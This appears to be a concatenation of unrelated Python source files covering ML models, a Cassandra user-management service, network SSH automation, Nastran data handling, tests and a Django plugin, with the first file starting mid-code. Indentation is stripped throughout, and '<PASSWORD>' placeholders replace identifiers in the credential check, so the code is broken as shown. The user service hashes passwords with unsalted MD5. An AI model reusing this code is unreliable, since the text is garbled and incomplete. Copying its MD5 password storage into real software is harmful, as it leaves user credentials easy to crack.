sigma_zi = (sigma_bu * sigma_td) / (torch.sqrt(sigma_td**2 + sigma_bu**2) + EPSILON)
# sample z_i from P(z_i | pa(z_i), x)
z_i = mu_zi + sigma_zi * self.unit_normal.sample([x.size(0)]).to(x.device)
# store samples and parameters
parents.append(z_i)
mu_z.append(mu_zi)
sigma_z.append(sigma_zi)
# sample from approximate posterior distribution q(z_1, z_2 ... z_n|x)
z = torch.cat(parents, dim=1)
out = torch.sigmoid(self.decoder(z))
# build output
output = {}
output['mu'] = out
output['means'] = mu_z
output['sigmas'] = sigma_z
# output['gate_params'] = self.gating_params.detach()
return output
|
456017
|
from dse.cqlengine import columns
from dse.cqlengine.models import Model
from dse.cqlengine.query import LWTException
from datetime import datetime
import hashlib
import validate_email
from .user_management_events_kafka import UserManagementPublisher
class UserModel(Model):
"""Model class that maps to the user table"""
__table_name__ = 'users'
user_id = columns.UUID(db_field='userid', primary_key=True)
first_name = columns.Text(db_field='firstname')
last_name = columns.Text(db_field='lastname')
email = columns.Text()
created_date = columns.Date()
class UserCredentialsModel(Model):
"""Model class that maps to the user_credentials table"""
__table_name__ = 'user_credentials'
email = columns.Text(primary_key=True)
user_id = columns.UUID(db_field='userid')
password = columns.Text()
def trim_and_hash_password(password):
md5_hashlib = hashlib.md5()
md5_hashlib.update(password.strip().encode('utf-8'))
return md5_hashlib.hexdigest()
class UserManagementService(object):
"""Provides methods that implement functionality of the UserManagement Service."""
def __init__(self):
self.user_management_publisher = UserManagementPublisher()
def create_user(self, user_id, first_name, last_name, email, password):
# validate inputs
if not validate_email.validate_email(email):
raise ValueError('Invalid email address')
# trim and hash the password
hashed_password = trim_and_hash_password(password)
# insert into user_credentials table first so we can ensure uniqueness with LWT
try:
UserCredentialsModel.if_not_exists().create(user_id=user_id, email=email, password=hashed_password)
except LWTException:
# Exact string in this message is expected by integration test
raise ValueError('Exception creating user because it already exists for ' + email)
# insert into users table
UserModel.create(user_id=user_id, first_name=first_name, last_name=last_name, email=email)
# Publish UserCreated event
self.user_management_publisher.publish_user_created_event(user_id=user_id, first_name=first_name,
last_name=last_name, email=email,
timestamp=datetime.utcnow())
def verify_credentials(self, email, password):
# validate email is not empty or null
if not email:
raise ValueError('No email address provided')
# retrieve the credentials for provided email from user_credentials table
user_credentials = UserCredentialsModel.get(email=email)
if not user_credentials:
raise ValueError('No such user')
# compare hashed password values
hashed_password = <PASSWORD>(password)
if not (hashed_password == <PASSWORD>):
raise ValueError('Authentication error')
return user_credentials.user_id
def get_user_profile(self, user_ids):
if not user_ids:
raise ValueError('No user IDs provided')
# see: https://datastax.github.io/python-driver/cqlengine/queryset.html#retrieving-objects-with-filters
# filter().all() returns a ModelQuerySet, we iterate over the query set to get the Model instances
user_results = UserModel.filter(user_id__in=list(user_ids)).all()
users = list()
for user in user_results:
users.append(user)
return users
|
456032
|
import numpy as np
from keras import backend as K
import os
import sys
def patch_path(path):
return os.path.join(os.path.dirname(__file__), path)
def main():
K.set_image_dim_ordering('tf')
sys.path.append(patch_path('..'))
from keras_video_classifier.library.recurrent_networks import VGG16BidirectionalLSTMVideoClassifier
from keras_video_classifier.library.utility.plot_utils import plot_and_save_history
from keras_video_classifier.library.utility.ucf.UCF101_loader import load_ucf
data_set_name = 'UCF-101'
input_dir_path = patch_path('very_large_data')
output_dir_path = patch_path('models/' + data_set_name)
report_dir_path = patch_path('reports/' + data_set_name)
np.random.seed(42)
# this line downloads the video files of UCF-101 dataset if they are not available in the very_large_data folder
load_ucf(input_dir_path)
classifier = VGG16BidirectionalLSTMVideoClassifier()
history = classifier.fit(data_dir_path=input_dir_path, model_dir_path=output_dir_path, data_set_name=data_set_name)
plot_and_save_history(history, VGG16BidirectionalLSTMVideoClassifier.model_name,
report_dir_path + '/' + VGG16BidirectionalLSTMVideoClassifier.model_name + '-history.png')
if __name__ == '__main__':
main()
|
456047
|
from concurrent.futures import ThreadPoolExecutor
from pprint import pprint
from datetime import datetime
import time
from itertools import repeat
import logging
import yaml
from netmiko import ConnectHandler, NetMikoAuthenticationException
logging.getLogger("paramiko").setLevel(logging.WARNING)
logging.basicConfig(
filename="ssh_connections.log",
format="%(threadName)s %(name)s %(levelname)s: %(message)s",
level=logging.INFO,
)
def send_show(device_dict, command):
ip = device_dict["host"]
logging.info(f"===> {datetime.now().time()} Connection: {ip}")
with ConnectHandler(**device_dict) as ssh:
ssh.enable()
result = ssh.send_command(command)
logging.info(f"<=== {datetime.now().time()} Received: {ip}")
return result
def send_command_to_devices(devices, command):
data = {}
with ThreadPoolExecutor(max_workers=2) as executor:
result = executor.map(send_show, devices, repeat(command))
for device, output in zip(devices, result):
data[device["host"]] = output
return data
if __name__ == "__main__":
with open("devices.yaml") as f:
devices = yaml.safe_load(f)
pprint(send_command_to_devices(devices, "sh ip int br"), width=120)
|
456065
|
from __future__ import print_function, absolute_import
from collections import OrderedDict
import numpy as np
import tables
from six import iteritems
from ._result import H5NastranResult
from ._bdf import H5NastranBDF
class H5Nastran(H5NastranBDF, H5NastranResult):
def __init__(self, h5filename, mode='r', nastran_type=None, nastran_version=None, in_memory=False):
super(H5Nastran, self).__init__(h5filename, mode=mode, nastran_type=nastran_type,
nastran_version=nastran_version, in_memory=in_memory)
if mode == 'w':
self._write_info()
else:
self._update()
def visualize(self):
from ..gui.visualization import to_vtk
if self.bdf is None:
self.load_bdf()
vtk_data = to_vtk(self.bdf)
vtk_data.visualize()
def _write_info(self):
import pyNastran
info = 'h5Nastran version %s\nPowered by pyNastran version %s' % (self.h5n_version_str, pyNastran.__version__)
self.h5f.create_array(self.table_paths.about_path, self.table_paths.about_table, obj=info.encode(),
title='h5Nastran Info', createparents=True)
versioning_dtype = np.dtype([
('H5NASTRAN_VERSION_STR', 'S8'),
('H5NASTRAN_VERSION', '<i8', (3,)),
('NASTRAN_TYPE', 'S8'),
('NASTRAN_VERSION', '<i8', (3,))
])
format = tables.descr_from_dtype(versioning_dtype)[0]
self.h5f.create_table(self.table_paths.versioning_path, self.table_paths.versioning_table, format,
'VERSIONING', expectedrows=1, createparents=True)
table = self.h5f.get_node(self.table_paths.versioning)
data = np.zeros(1, dtype=versioning_dtype)
data['H5NASTRAN_VERSION_STR'][0] = self.h5n_version_str
data['H5NASTRAN_VERSION'][0] = self.h5n_version
nastran_type = self.nastran_type
if nastran_type is None:
nastran_type = ''
data['NASTRAN_TYPE'][0] = nastran_type
data['NASTRAN_VERSION'][0] = self.nastran_version
table.append(data)
self.defaults.save(self)
self.h5f.flush()
def _update(self):
self.nastran.update()
self.defaults.load(self)
def element_search(self, elem_types=None, elem_pids=None, elem_ids=None, box=None, partial_fit=True):
class Dummy(object):
def __contains__(self, val):
return True
def __le__(self, val):
return True
def __ge__(self, val):
return True
dummy = Dummy()
if elem_types is None:
elem_types = dummy
if elem_pids is None:
elem_pids = dummy
if elem_ids is None:
elem_ids = dummy
if box is None:
min_x = dummy
max_x = dummy
min_y = dummy
max_y = dummy
min_z = dummy
max_z = dummy
else:
x, y, z = box
if x is None:
min_x = dummy
max_x = dummy
else:
min_x, max_x = x
if y is None:
min_y = dummy
max_y = dummy
else:
min_y, max_y = y
if z is None:
min_z = dummy
max_z = dummy
else:
min_z, max_z = z
if min_x is None:
min_x = dummy
if min_y is None:
min_y = dummy
if min_z is None:
min_z = dummy
if max_x is None:
max_x = dummy
if max_y is None:
max_y = dummy
if max_z is None:
max_z = dummy
elms = []
bdf = self.bdf
for eid, elm in iteritems(bdf.elements):
pid = elm.pid
etype = elm.type
if etype not in elem_types:
continue
if pid not in elem_pids:
continue
if eid not in elem_ids:
continue
nodes = elm.node_ids
in_box = set()
bdf_nodes = bdf.nodes
for nid in nodes:
node = bdf_nodes[nid]
x, y, z = node.get_position()
if min_x <= x <= max_x and min_y <= y <= max_y and min_z <= z <= max_z:
in_box.add(True)
else:
in_box.add(False)
if partial_fit:
if True in in_box:
elms.append(elm)
else:
if False not in in_box:
elms.append(elm)
return elms
|
456073
|
effects = {
# instruction name -> [bytes, newva, contraints, effects]
'rdtsc': ('0f31', None, (),
('edx = TSC_HIGH',
'eax = TSC_LOW')),
'div16': ('66f7f2', None, (),
('eax = (((((edx & 0x0000ffff) << 16) | (eax & 0x0000ffff)) / (edx & 0x0000ffff)) | (eax & 0xffff0000))',
'edx = (((((edx & 0x0000ffff) << 16) | (eax & 0x0000ffff)) % (edx & 0x0000ffff)) | (edx & 0xffff0000))')
),
'div32': ('f7f1', None, (),
('eax = (((edx << 32) | eax) / ecx)',
'edx = (((edx << 32) | eax) % ecx)')
),
'cwde': ('98', None, (),
('eax = signextend((eax & 0x0000ffff), 4)',)
),
'cdq': ('99', None, (),
('eax = signextend((eax & 0x0000ffff), 4)',
'edx = (signextend((eax & 0x0000ffff), 8) >> 32)')
),
'ror': ('C1C90C', None, (),
('ecx = ((ecx >> (12 % 32)) | (ecx << (32 - (12 % 32))))',)
),
# rol ebx,cl
'rol': ('d3c3', None, (),
('ebx = ((ebx << ((ecx & 255) % 32)) | (ebx >> (32 - ((ecx & 255) % 32))))',)
),
}
|
456075
|
import os
import unittest
from os.path import expanduser
from util.Docker import Docker
class GoServices(unittest.TestCase):
def test_go(self):
script_dir = os.path.dirname(os.path.realpath(__file__))
code_dir = script_dir + "/.."
home = expanduser("~")
goPath = os.environ['GOPATH']
command = ['docker', 'run', '--rm', '-v', goPath + ':/go/src/', '-v', code_dir + ':/go/src/github.com/microservices-demo/catalogue', '-w', '/go/src/github.com/microservices-demo/catalogue', '-e', 'GOPATH=/go/', 'golang:1.7', 'go', 'test', '-v', '-covermode=count', '-coverprofile=coverage.out']
print(Docker().execute(command))
if __name__ == '__main__':
unittest.main()
|
456088
|
import numpy as np
from axelerate.networks.yolo.backend.utils.box import BoundBox
from axelerate.networks.yolo.backend.utils.box import BoundBox, nms_boxes, boxes_to_array
class YoloDecoder(object):
def __init__(self,
anchors = [0.57273, 0.677385, 1.87446, 2.06253, 3.33843, 5.47434, 7.88282, 3.52778, 9.77052, 9.16828],
nms_threshold=0.2):
self._anchors = anchors
self._nms_threshold = nms_threshold
def run(self, netout, obj_threshold=0.3):
"""Convert Yolo network output to bounding box
# Args
netout : 4d-array, shape of (grid_h, grid_w, num of boxes per grid, 5 + n_classes)
YOLO neural network output array
# Returns
boxes : array, shape of (N, 4)
coordinate scale is normalized [0, 1]
probs : array, shape of (N, nb_classes)
"""
grid_h, grid_w, nb_box = netout.shape[:3]
boxes = []
# decode the output by the network
netout[..., 4] = _sigmoid(netout[..., 4])
netout[..., 5:] = netout[..., 4][..., np.newaxis] * _softmax(netout[..., 5:])
netout[..., 5:] *= netout[..., 5:] > obj_threshold
for row in range(grid_h):
for col in range(grid_w):
for b in range(nb_box):
# from 4th element onwards are confidence and class classes
classes = netout[row,col,b,5:]
if np.sum(classes) > 0:
# first 4 elements are x, y, w, and h
x, y, w, h = netout[row,col,b,:4]
x = (col + _sigmoid(x)) / grid_w # center position, unit: image width
y = (row + _sigmoid(y)) / grid_h # center position, unit: image height
w = self._anchors[2 * b + 0] * np.exp(w) / grid_w # unit: image width
h = self._anchors[2 * b + 1] * np.exp(h) / grid_h # unit: image height
confidence = netout[row,col,b,4]
box = BoundBox(x, y, w, h, confidence, classes)
boxes.append(box)
boxes = nms_boxes(boxes, len(classes), self._nms_threshold, obj_threshold)
boxes, probs = boxes_to_array(boxes)
return boxes, probs
def _sigmoid(x):
return 1. / (1. + np.exp(-x))
def _softmax(x, axis=-1, t=-100.):
x = x - np.max(x)
if np.min(x) < t:
x = x/np.min(x)*t
e_x = np.exp(x)
return e_x / e_x.sum(axis, keepdims=True)
|
456159
|
import functools
import torch
class TensorList(list):
"""Container mainly used for lists of torch tensors. Extends lists with pytorch functionality."""
def __init__(self, list_of_tensors = None):
if list_of_tensors is None:
list_of_tensors = list()
super(TensorList, self).__init__(list_of_tensors)
def __getitem__(self, item):
if isinstance(item, int):
return super(TensorList, self).__getitem__(item)
elif isinstance(item, (tuple, list)):
return TensorList([super(TensorList, self).__getitem__(i) for i in item])
else:
return TensorList(super(TensorList, self).__getitem__(item))
def __add__(self, other):
if TensorList._iterable(other):
return TensorList([e1 + e2 for e1, e2 in zip(self, other)])
return TensorList([e + other for e in self])
def __radd__(self, other):
if TensorList._iterable(other):
return TensorList([e2 + e1 for e1, e2 in zip(self, other)])
return TensorList([other + e for e in self])
def __iadd__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] += e2
else:
for i in range(len(self)):
self[i] += other
return self
def __sub__(self, other):
if TensorList._iterable(other):
return TensorList([e1 - e2 for e1, e2 in zip(self, other)])
return TensorList([e - other for e in self])
def __rsub__(self, other):
if TensorList._iterable(other):
return TensorList([e2 - e1 for e1, e2 in zip(self, other)])
return TensorList([other - e for e in self])
def __isub__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] -= e2
else:
for i in range(len(self)):
self[i] -= other
return self
def __mul__(self, other):
if TensorList._iterable(other):
return TensorList([e1 * e2 for e1, e2 in zip(self, other)])
return TensorList([e * other for e in self])
def __rmul__(self, other):
if TensorList._iterable(other):
return TensorList([e2 * e1 for e1, e2 in zip(self, other)])
return TensorList([other * e for e in self])
def __imul__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] *= e2
else:
for i in range(len(self)):
self[i] *= other
return self
def __truediv__(self, other):
if TensorList._iterable(other):
return TensorList([e1 / e2 for e1, e2 in zip(self, other)])
return TensorList([e / other for e in self])
def __rtruediv__(self, other):
if TensorList._iterable(other):
return TensorList([e2 / e1 for e1, e2 in zip(self, other)])
return TensorList([other / e for e in self])
def __itruediv__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] /= e2
else:
for i in range(len(self)):
self[i] /= other
return self
def __matmul__(self, other):
if TensorList._iterable(other):
return TensorList([e1 @ e2 for e1, e2 in zip(self, other)])
return TensorList([e @ other for e in self])
def __rmatmul__(self, other):
if TensorList._iterable(other):
return TensorList([e2 @ e1 for e1, e2 in zip(self, other)])
return TensorList([other @ e for e in self])
def __imatmul__(self, other):
if TensorList._iterable(other):
for i, e2 in enumerate(other):
self[i] @= e2
else:
for i in range(len(self)):
self[i] @= other
return self
def __mod__(self, other):
if TensorList._iterable(other):
return TensorList([e1 % e2 for e1, e2 in zip(self, other)])
return TensorList([e % other for e in self])
def __rmod__(self, other):
if TensorList._iterable(other):
return TensorList([e2 % e1 for e1, e2 in zip(self, other)])
return TensorList([other % e for e in self])
def __pos__(self):
return TensorList([+e for e in self])
def __neg__(self):
return TensorList([-e for e in self])
def __le__(self, other):
if TensorList._iterable(other):
return TensorList([e1 <= e2 for e1, e2 in zip(self, other)])
return TensorList([e <= other for e in self])
def __ge__(self, other):
if TensorList._iterable(other):
return TensorList([e1 >= e2 for e1, e2 in zip(self, other)])
return TensorList([e >= other for e in self])
def concat(self, other):
return TensorList(super(TensorList, self).__add__(other))
def copy(self):
return TensorList(super(TensorList, self).copy())
def unroll(self):
if not any(isinstance(t, TensorList) for t in self):
return self
new_list = TensorList()
for t in self:
if isinstance(t, TensorList):
new_list.extend(t.unroll())
else:
new_list.append(t)
return new_list
def list(self):
return list(self)
def attribute(self, attr: str, *args):
return TensorList([getattr(e, attr, *args) for e in self])
def apply(self, fn):
return TensorList([fn(e) for e in self])
def __getattr__(self, name):
if not hasattr(torch.Tensor, name):
raise AttributeError('\'TensorList\' object has not attribute \'{}\''.format(name))
def apply_attr(*args, **kwargs):
return TensorList([getattr(e, name)(*args, **kwargs) for e in self])
return apply_attr
@staticmethod
def _iterable(a):
return isinstance(a, (TensorList, list))
def tensor_operation(op):
def islist(a):
return isinstance(a, TensorList)
@functools.wraps(op)
def oplist(*args, **kwargs):
if len(args) == 0:
raise ValueError('Must be at least one argument without keyword (i.e. operand).')
if len(args) == 1:
if islist(args[0]):
return TensorList([op(a, **kwargs) for a in args[0]])
else:
# Multiple operands, assume max two
if islist(args[0]) and islist(args[1]):
return TensorList([op(a, b, *args[2:], **kwargs) for a, b in zip(*args[:2])])
if islist(args[0]):
return TensorList([op(a, *args[1:], **kwargs) for a in args[0]])
if islist(args[1]):
return TensorList([op(args[0], b, *args[2:], **kwargs) for b in args[1]])
# None of the operands are lists
return op(*args, **kwargs)
return oplist
|
456181
|
import pytest
from ddtrace.internal.sma import SimpleMovingAverage
from ddtrace.internal.writer import DEFAULT_SMA_WINDOW
def test_min_size():
sma = SimpleMovingAverage(DEFAULT_SMA_WINDOW)
assert DEFAULT_SMA_WINDOW == sma.size
assert DEFAULT_SMA_WINDOW == len(sma.counts)
assert DEFAULT_SMA_WINDOW == len(sma.totals)
with pytest.raises(ValueError):
sma = SimpleMovingAverage(0)
def test_count_greater_than_total():
sma = SimpleMovingAverage(DEFAULT_SMA_WINDOW)
with pytest.raises(ValueError):
sma.set(2, 1)
def test_moving_average():
sma = SimpleMovingAverage(4)
assert 0.0 == sma.get()
sma.set(1, 2)
assert 0.5 == sma.get()
sma.set(2, 2)
assert 0.75 == sma.get()
sma.set(1, 4)
assert 0.5 == sma.get()
sma.set(0, 12)
assert 0.2 == sma.get()
sma.set(2, 2)
assert 0.25 == sma.get()
sma.set(15, 18)
assert 0.5 == sma.get()
sma = SimpleMovingAverage(1)
assert 0.0 == sma.get()
sma.set(1, 2)
assert 0.5 == sma.get()
sma.set(2, 2)
assert 1.0 == sma.get()
sma.set(0, 0)
assert 0.0 == sma.get()
sma = SimpleMovingAverage(DEFAULT_SMA_WINDOW)
assert 0.0 == sma.get()
sma.set(1, 1)
assert 1.0 == sma.get()
sma.set(0, 0)
assert 1.0 == sma.get()
sma.set(0, 0)
assert 1.0 == sma.get()
sma.set(0, 4)
assert 0.2 == sma.get()
sma.set(1, 3)
assert 0.25 == sma.get()
sma.set(1, 4)
assert 0.25 == sma.get()
sma.set(0, 0)
assert 0.25 == sma.get()
sma.set(0, 0)
assert 0.25 == sma.get()
sma.set(0, 0)
assert 0.25 == sma.get()
sma.set(7, 8)
assert 0.5 == sma.get()
sma.set(1, 1)
assert 0.5 == sma.get()
sma.set(10, 20)
assert 0.5 == sma.get()
|
456184
|
import sys
import unittest
from linkml_runtime.dumpers import rdf_dumper, json_dumper
from linkml_runtime.loaders import yaml_loader
from pyshex.evaluate import evaluate
from linkml.generators.jsonldcontextgen import ContextGenerator
from linkml.generators.shexgen import ShExGenerator
from tests.test_generators.environment import env
from tests.test_generators.test_pythongen import make_python
SCHEMA = env.input_path('kitchen_sink.yaml')
DATA = env.input_path('kitchen_sink_inst_01.yaml')
SHEXLOG = env.expected_path('shexgen_log.txt')
class ShExTestCase(unittest.TestCase):
unittest.skipIf(sys.version_info < (3, 8), "ShEx has issues with python 3.7 at the moment")
def test_shex(self):
""" shex """
kitchen_module = make_python(False)
inst = yaml_loader.load(DATA, target_class=kitchen_module.Dataset)
shexstr = ShExGenerator(SCHEMA, mergeimports=True).serialize(collections=False)
#print(shexstr)
ctxt = ContextGenerator(SCHEMA, mergeimports=True).serialize()
inst = yaml_loader.load(DATA, target_class=kitchen_module.Dataset)
with open(SHEXLOG, 'w') as log:
log.write(json_dumper.dumps(element=inst, contexts=ctxt))
try:
g = rdf_dumper.as_rdf_graph(element=inst, contexts=ctxt)
except Exception as e:
if 'URL could not be dereferenced' in str(e):
print("WARNING: non-modified version of pyld detected. RDF dumping test skipped")
return
raise e
#print(g)
nodes = set()
for (s,p,o) in g.triples((None, None, None)):
#print(f'{s} {p} {o}')
nodes.add(s)
for node in nodes:
r = evaluate(g, shexstr,
focus=node)
log.write(f'Eval {node} = {r}\n')
# start="http://example.org/model/FriendlyPerson",
# focus="http://example.org/people/42")
if __name__ == '__main__':
unittest.main()
|
456187
|
from __future__ import print_function, unicode_literals
import platform
import sys
info = {
'impl': platform.python_implementation(),
'version': platform.python_version(),
'revision': platform.python_revision(),
'maxunicode': sys.maxunicode,
'maxsize': sys.maxsize
}
search_modules = ['charade', 'chardet', 'datrie', 'genshi', 'html5lib', 'lxml', 'six']
found_modules = []
for m in search_modules:
try:
__import__(m)
except ImportError:
pass
else:
found_modules.append(m)
info['modules'] = ', '.join(found_modules)
print("""html5lib debug info:
Python %(version)s (revision: %(revision)s)
Implementation: %(impl)s
sys.maxunicode: %(maxunicode)X
sys.maxsize: %(maxsize)X
Installed modules: %(modules)s""" % info)
|
456194
|
class ImageBackgroundSettings(BackgroundSettings,IDisposable):
""" Represents the rendering image background settings. """
def Dispose(self):
""" Dispose(self: BackgroundSettings,A_0: bool) """
pass
def ReleaseUnmanagedResources(self,*args):
""" ReleaseUnmanagedResources(self: BackgroundSettings,disposing: bool) """
pass
def __enter__(self,*args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self,*args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self,*args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
BackgroundImageFit=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The background image fit type.
Get: BackgroundImageFit(self: ImageBackgroundSettings) -> BackgroundImageFit
Set: BackgroundImageFit(self: ImageBackgroundSettings)=value
"""
FilePath=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""File path of the image for the rendering background.
Get: FilePath(self: ImageBackgroundSettings) -> str
Set: FilePath(self: ImageBackgroundSettings)=value
"""
OffsetHeight=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The vertical offset of the rendering image to the rendering region.
Get: OffsetHeight(self: ImageBackgroundSettings) -> float
Set: OffsetHeight(self: ImageBackgroundSettings)=value
"""
OffsetWidth=property(lambda self: object(),lambda self,v: None,lambda self: None)
"""The horizontal offset of the rendering image to the rendering region.
Get: OffsetWidth(self: ImageBackgroundSettings) -> float
Set: OffsetWidth(self: ImageBackgroundSettings)=value
"""
|
456195
|
import json
import spacy
from collections import defaultdict
nlp = spacy.load('en_core_web_sm')
def load_json(filename):
"Wrapper function to load JSON data."
with open(filename) as f:
data = json.load(f)
return data
def save_json(data, filename):
"Wrapper function to save the data as JSON."
with open(filename, 'w') as f:
json.dump(data, f)
def compounds_from_doc(doc):
compounds = []
current = []
for token in doc:
if token.tag_.startswith('NN'):
current.append(token.orth_.lower())
elif len(current) == 1:
current = []
elif len(current) > 1:
compounds.append(current)
current = []
if len(current) > 1:
compounds.append(current)
return compounds
def annotate_coco(filename, tag=False, compounds=False):
"Function to annotate existing coco data"
data = load_json(filename)
for entry in data['annotations']:
raw_description = entry['caption']
doc = nlp.tokenizer(raw_description)
entry['tokenized'] = [tok.orth_ for tok in doc]
if tag:
# Call the tagger on the document.
nlp.tagger(doc)
entry['tagged'] = [(tok.orth_.lower(),tok.tag_) for tok in doc]
if compounds:
list_of_compounds = compounds_from_doc(doc)
entry['compounds'] = list_of_compounds
return data
tokenized_train = annotate_coco('./Data/COCO/Raw/captions_train2014.json', tag=True, compounds=True)
save_json(tokenized_train, './Data/COCO/Processed/tokenized_train2014.json')
tagged_val = annotate_coco('./Data/COCO/Raw/captions_val2014.json', tag=True, compounds=True)
save_json(tagged_val, './Data/COCO/Processed/tagged_val2014.json')
|
456204
|
import argparse
import json
import pytest
from typing import Dict, List, Tuple, Union
NestedDict = Union[Dict[str, float], "NestedDict"]
def flatten_nested_dict(nested_dict: NestedDict) -> Dict[Tuple[str, ...], float]:
def _recursively_flatten(
target: Dict[Tuple[str, ...], float], d: NestedDict, prefix: List[str]
) -> Dict[Tuple[str, ...], float]:
for key, value in d.items():
if isinstance(value, dict):
_recursively_flatten(target, value, prefix + [key])
else:
target[tuple(prefix + [key])] = value
return target
return _recursively_flatten({}, nested_dict, [])
def assert_dicts_approx_equal(
d1: NestedDict, d2: NestedDict, rel: float = None, abs: float = None
):
d1 = flatten_nested_dict(d1)
d2 = flatten_nested_dict(d2)
assert d1.keys() == d2.keys()
for key in d1.keys():
assert d1[key] == pytest.approx(d2[key], rel=rel, abs=abs), (key, d1[key], d2[key])
def load_scores(input_file: str):
scores_dict = {}
with open(input_file, "r") as f:
for line in f:
instance = json.loads(line)
scores_dict[(instance["instance_id"], instance["summarizer_id"])] = instance
return scores_dict
def main(args):
original = load_scores(args.original)
docker = load_scores(args.docker)
assert len(original) == len(docker)
for key in original.keys():
assert_dicts_approx_equal(original[key]["metrics"], docker[key]["metrics"], abs=1e-4)
print("Equal", args.original, args.docker)
if __name__ == '__main__':
argp = argparse.ArgumentParser()
argp.add_argument("--original", required=True)
argp.add_argument("--docker", required=True)
args = argp.parse_args()
main(args)
|
456216
|
import argparse
import torch
from utils.cli import boolean_argument
def get_args(rest_args):
parser = argparse.ArgumentParser()
parser.add_argument("--env-name", default="PointRobotSparse-v0")
parser.add_argument("--seed", type=int, default=73)
parser.add_argument("--max-rollouts-per-task", default=2)
parser.add_argument("--num-trajs-per-task", type=int, default=None)
parser.add_argument("--hindsight-relabelling", type=int, default=True)
# parser.add_argument('--hindsight-relabelling', type=int, default=False)
parser.add_argument("--num-iters", default=100)
parser.add_argument("--tasks-batch-size", default=8)
parser.add_argument("--vae-batch-num-rollouts-per-task", default=8)
parser.add_argument(
"--vae-lr",
type=float,
default=0.0003,
help="learning rate for VAE (default: 3e-4)",
)
parser.add_argument(
"--kl-weight", type=float, default=0.05, help="weight for the KL term"
)
parser.add_argument(
"--vae-batch-num-elbo-terms",
default=None,
help="for how many timesteps to compute the ELBO; None uses all",
)
# - encoder
parser.add_argument(
"--encoder_type", type=str, default="rnn", help="choose: rnn, tcn, deepset"
)
parser.add_argument(
"--task-embedding-size",
type=int,
default=5,
help="dimensionality of latent space",
)
parser.add_argument("--aggregator-hidden-size", type=int, default=128)
parser.add_argument("--layers-before-aggregator", nargs="+", type=int, default=[])
parser.add_argument("--layers-after-aggregator", nargs="+", type=int, default=[])
# parser.add_argument('--action-embedding-size', type=int, default=0)
parser.add_argument("--action-embedding-size", type=int, default=16)
parser.add_argument("--state-embedding-size", type=int, default=32)
parser.add_argument("--reward-embedding-size", type=int, default=16)
# - decoder: rewards
parser.add_argument("--decode-reward", default=True, help="use reward decoder")
parser.add_argument(
"--input-prev-state", default=False, help="use prev state for rew pred"
)
parser.add_argument(
"--input-action", default=False, help="use prev action for rew pred"
)
parser.add_argument(
"--reward-decoder-layers", nargs="+", type=int, default=[32, 32]
)
parser.add_argument(
"--rew-pred-type",
type=str,
default="deterministic",
help="choose from: bernoulli, deterministic",
)
parser.add_argument(
"--multihead-for-reward",
default=False,
help="one head per reward pred (i.e. per state)",
)
parser.add_argument("--rew-loss-coeff", type=float, default=1.0)
# - decoder: state transitions
parser.add_argument("--decode-state", default=False)
parser.add_argument("--state-loss-coeff", type=float, default=1.0)
# - decoder: ground-truth task (after Humplik et al. 2019)
parser.add_argument("--decode-task", default=False)
parser.add_argument("--task-loss-coeff", default=1.0)
# --- ABLATIONS ---
parser.add_argument("--disable-decoder", default=False)
parser.add_argument("--disable-stochasticity-in-latent", default=False)
parser.add_argument("--kl-to-gauss-prior", default=False)
parser.add_argument("--learn-prior", default=False)
parser.add_argument(
"--decode-only-past",
default=False,
help="whether to decode future observations",
)
parser.add_argument("--log-interval", default=1)
parser.add_argument("--save-interval", default=5)
parser.add_argument("--eval-interval", default=20)
parser.add_argument("--main-data-dir", default="./batch_data")
parser.add_argument("--data-dir", default="data_rand_init")
parser.add_argument("--save-dir-prefix", default="relabel_rand_init")
# parser.add_argument('--save-dir-prefix', default='no_relabel_rand_init')
parser.add_argument("--log-tensorboard", default=True)
parser.add_argument("--save-model", default=True)
parser.add_argument("--save-dir", default="./trained_vae")
parser.add_argument("--use-gpu", default=True)
args = parser.parse_args(rest_args)
return args
|
456218
|
from builtins import str
from django.contrib import messages
from django.urls import reverse
from django.shortcuts import redirect
from django.contrib.auth.decorators import login_required
from django.shortcuts import render
from pykeg.web.decorators import staff_member_required
from pykeg.util import kbjson
from . import forms
from . import client
@staff_member_required
def admin_settings(request, plugin):
context = {}
settings_form = plugin.get_site_settings_form()
if request.method == "POST":
if "submit-settings" in request.POST:
settings_form = forms.SiteSettingsForm(request.POST)
if settings_form.is_valid():
plugin.save_site_settings_form(settings_form)
venue_id = settings_form.cleaned_data.get("venue_id")
venue = None
if venue_id:
c = plugin.get_client()
try:
venue = c.venues(venue_id)
except client.FoursquareClientError as e:
messages.error(request, "Error fetching venue information: %s" % str(e))
plugin.save_venue_detail(venue)
messages.success(request, "Settings updated.")
if "test-api" in request.POST:
plugin = request.plugins["foursquare"]
c = plugin.get_client()
venue_id = plugin.get_venue_id() or "49d01698f964a520fd5a1fe3" # Golden Gate Bridge
try:
venue_info = c.venues(venue_id)
context["test_response"] = kbjson.dumps(venue_info, indent=2)
messages.success(request, "API test successful.")
except client.FoursquareClientError as e:
messages.success(request, "API test failed: {}".format(e))
context["plugin"] = plugin
context["settings_form"] = settings_form
context["venue_detail"] = plugin.get_venue_detail()
return render(request, "contrib/foursquare/foursquare_admin_settings.html", context=context)
@login_required
def user_settings(request, plugin):
context = {}
user = request.user
settings_form = plugin.get_user_settings_form(user)
if request.method == "POST":
if "submit-settings" in request.POST:
settings_form = forms.UserSettingsForm(request.POST)
if settings_form.is_valid():
plugin.save_user_settings_form(user, settings_form)
messages.success(request, "Settings updated")
context["plugin"] = plugin
context["venue"] = plugin.get_venue_detail()
context["profile"] = plugin.get_user_profile(user)
context["settings_form"] = settings_form
return render(request, "contrib/foursquare/foursquare_user_settings.html", context=context)
@login_required
def auth_redirect(request):
if "submit-remove" in request.POST:
plugin = request.plugins.get("foursquare")
plugin.save_user_profile(request.user, None)
plugin.save_user_token(request.user, "")
messages.success(request, "Removed Foursquare account.")
return redirect("account-plugin-settings", plugin_name="foursquare")
